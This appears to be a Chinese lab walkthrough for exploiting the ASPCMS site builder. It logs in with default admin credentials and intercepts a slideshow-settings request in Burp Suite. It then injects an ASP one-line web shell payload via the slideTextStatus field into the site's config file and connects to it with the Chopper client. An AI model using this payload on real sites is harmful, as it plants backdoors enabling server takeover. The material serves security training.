ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且
⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
步骤一:访问靶场
访问后台页面——登录后台——填写用户密码,用户名是admin,密码是123456。
后台的地址:/admin_aspcms/login.asp
点击扩展功能——幻灯片设置——点击保存——使用burpsuite抓包
步骤二:抓包修改数据包插入 木马语句。
将抓包后的里面slideTextStatus字段后面改为1%25><%25Eval(Request (chr(65)))%25><%25 ,密码是a。
影响的文件是/config/AspCms_Config.asp
发送到repeter重放器模块,查看修改成功后看到一个地址。
步骤三:使用菜刀连接shell
访问一下地址进行菜刀连接
连接成功
